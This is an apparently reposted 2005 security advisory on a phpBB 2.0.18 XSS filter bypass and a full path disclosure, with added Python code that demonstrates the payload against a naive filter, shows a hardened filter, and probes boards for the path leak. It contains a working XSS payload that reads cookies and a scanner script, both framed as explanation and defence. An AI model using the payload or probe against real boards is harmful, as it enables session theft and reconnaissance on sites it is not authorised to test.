phpBB 2.0.18 XSS and Full Path Disclosure

Details: SecurityAlert

SecurityAlert Id : 269

SecurityRisk : Low

Remote Exploit : Yes

Local Exploit : No

Exploit Given : Yes

Credit : Maksymilian Arciemowicz

Date : 17.12.2005

Affected Software : phpBB <= 2.0.18

Advisory Text :


[phpBB 2.0.18 XSS and Full Path Disclosure cXIb8O3.22]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 16.12.2005
from TEAM

- --- 0. Description ---

phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites.

- --- 1. XSS ---

If the board has "Allowed HTML tags" set to ON for a tag list such as b,i,u,pre, and you have "Always allow HTML: YES" in your profile (or you post as a Guest), you can post these tags:

<B C=">" X="<B "> HELO </B>

<B C=">" X="<B "> HALO </B>

The ">" inside the quoted C attribute ends the tag as far as the board's filter is concerned, while a browser reads on to the closing quote of that attribute, so attributes on the permitted <B> tag reach the victim's browser unfiltered and the victim's cookies can be read.
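The bypass works because the filter and the browser disagree about where a tag ends. The following Python is an added example written for this page, not phpBB's code: it models a naive regex whitelist filter (a simplified stand-in for the kind of filter the payload defeats, not a copy of phpBB's `prepare_message`) beside a hardened filter that tokenises the way a browser does and re-emits only bare whitelisted tags. The `onmouseover="alert(document.cookie)"` handler inserted into the author's payload shape is my addition, to show what lands in the part the naive filter treats as plain text.

```python
import html
import re
from html.parser import HTMLParser

ALLOWED_TAGS = {"b", "i", "u", "pre"}   # the "Allowed HTML tags" list from the advisory

# Constructed payload in the advisory's shape; the onmouseover handler is an addition
# for illustration. The '>' inside C="..." is what splits the filter's view of the tag.
PAYLOAD = '<B C=">" onmouseover="alert(document.cookie)" X="<B "> HELO </B>'

# --- naive filter (stand-in, not phpBB's code) -------------------------------------
# Tags are located with a regex that stops at the FIRST '>', quoted or not.
TAG_RE = re.compile(r"<(/?)([A-Za-z]+)([^>]*)>")
DANGEROUS_ATTR_RE = re.compile(r"\bon\w+\s*=|javascript:", re.I)


def escape_text(text):
    # Text between tags only gets '<' and '>' neutralised; quotes are left alone,
    # which is exactly what lets the browser reassemble the split tag.
    return text.replace("<", "&lt;").replace(">", "&gt;")


def naive_filter(message):
    out, pos = [], 0
    for m in TAG_RE.finditer(message):
        out.append(escape_text(message[pos:m.start()]))
        _slash, name, attrs = m.groups()
        if name.lower() in ALLOWED_TAGS and not DANGEROUS_ATTR_RE.search(attrs):
            out.append(m.group(0))              # allowed tag whose attributes "looked" harmless
        else:
            out.append(html.escape(m.group(0)))  # anything else is rendered inert
        pos = m.end()
    out.append(escape_text(message[pos:]))
    return "".join(out)


# --- hardened filter: tokenise like a browser, rebuild only bare whitelisted tags ---
class WhitelistRebuilder(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED_TAGS:
            self.out.append(f"<{tag}>")          # attributes are dropped, never copied through
        else:
            self.out.append(html.escape(self.get_starttag_text()))

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")
        else:
            self.out.append(html.escape(f"</{tag}>"))

    def handle_data(self, data):
        self.out.append(html.escape(data))       # every text node is re-escaped


def safe_filter(message):
    parser = WhitelistRebuilder()
    parser.feed(message)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    print("naive:", naive_filter(PAYLOAD))   # payload survives byte for byte
    print("safe :", safe_filter(PAYLOAD))    # <b> HELO </b>
```

The naive filter does reject the obvious `<b onmouseover=...>`, but for the quoted payload it sees two harmless `<B ...>` fragments and a run of "text" containing the handler, so the message passes unchanged. Rebuilding the output from a real tokeniser (rather than deciding what to keep from the input) removes the ambiguity: whatever the browser would treat as an attribute never reaches the output.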

- --- 2. Full Path Disclosure ---

In file admin/admin_disallow.php is:

- -25-31---
if( !empty($setmodules) )
{
	$filename = basename(__FILE__);
	$module['Users']['Disallow'] = append_sid($filename);

	return;
}
- -25-31---

When the file is requested directly, the function append_sid() does not exist yet, so the call on line 28 is fatal. If the server has:

register_globals = On
display_errors = On

try:

http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1

- -RESULT ERROR---
Fatal error: Call to undefined function: append_sid() in /www/2018/phpBB2/admin/admin_disallow.php on line 28
- -RESULT ERROR---

The error message discloses the absolute filesystem path of the phpBB installation.
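A small checker for this condition, added here as an example (not part of the advisory or of phpBB): it requests the path above with `setmodules=1` and parses PHP's fatal-error line out of the response. Both PHP output formats are handled, the plain-text one shown in the advisory and the `<b>`-wrapped one PHP emits when `html_errors` is on. The function name `probe`, the `fpd-check` User-Agent and the sample responses are constructed for this example; the sample path is the one the advisory shows.

```python
import html
import re
import sys
import urllib.error
import urllib.parse
import urllib.request

# PHP 4 wrote "Call to undefined function: name()", PHP 5 dropped the colon; both are matched.
FATAL_RE = re.compile(
    r"Fatal error:\s+Call to undefined function:?\s+(?P<func>\w+)\(\)\s+"
    r"in\s+(?P<path>\S+)\s+on line\s+(?P<line>\d+)",
    re.I,
)
TAG_RE = re.compile(r"<[^>]+>")


def extract_disclosed_path(body):
    """Return (function, absolute path, line) if the body carries a PHP fatal error, else None."""
    # Stripping tags first makes the html_errors=On variant look like the plain one.
    text = html.unescape(TAG_RE.sub("", body))
    m = FATAL_RE.search(text)
    if not m:
        return None
    return m.group("func"), m.group("path"), int(m.group("line"))


def probe(base_url, timeout=10):
    """Fetch admin/admin_disallow.php?setmodules=1 below base_url and report any disclosed path.
    Run only against boards you are authorised to test."""
    url = urllib.parse.urljoin(base_url.rstrip("/") + "/",
                               "admin/admin_disallow.php?setmodules=1")
    req = urllib.request.Request(url, headers={"User-Agent": "fpd-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        # A fatal error may come back as HTTP 500; the body is still what we want to inspect.
        body = err.read().decode("utf-8", "replace")
    return extract_disclosed_path(body)


# Constructed sample responses in the shape the advisory shows.
SAMPLE_PLAIN = ("Fatal error: Call to undefined function: append_sid() in "
                "/www/2018/phpBB2/admin/admin_disallow.php on line 28")
SAMPLE_HTML = ("<br />\n<b>Fatal error</b>:  Call to undefined function: append_sid() in "
               "<b>/www/2018/phpBB2/admin/admin_disallow.php</b> on line <b>28</b><br />\n")

if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(probe(sys.argv[1]))            # e.g. python fpd_check.py http://host/phpBB2/
    else:
        print(extract_disclosed_path(SAMPLE_PLAIN))
        print(extract_disclosed_path(SAMPLE_HTML))
```

A `None` result means either the board is not affected or the server hides errors. On the server side the disclosure goes away with `display_errors = Off` (keep `log_errors = On` so the fatal error still reaches the log) and `register_globals = Off`, which also stops `$setmodules` from being set from the query string in the first place.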

- --- 3. Greets ---

sp3x

- --- 4. Contact ---

Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: TEAM

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)

iD8DBQFDpDtC3Ke13X/fTO4RAosCAJkBcYRNbHKDGeuwnY1U/WXMhzDnVQCgl39D
/0u14EN2sQAh1Bwu0yvT48Q=
=lsL8
-----END PGP SIGNATURE-----

Oh, by the way, I guess the part at the top means this:

Personal signature: you fill out a personalized signature that is automatically included at the bottom of your posts. The personalized signature has a 512 character limit.

Prohibited HTML tags
Allow the style tag
Allow emoticons

Find "allow HTML tags"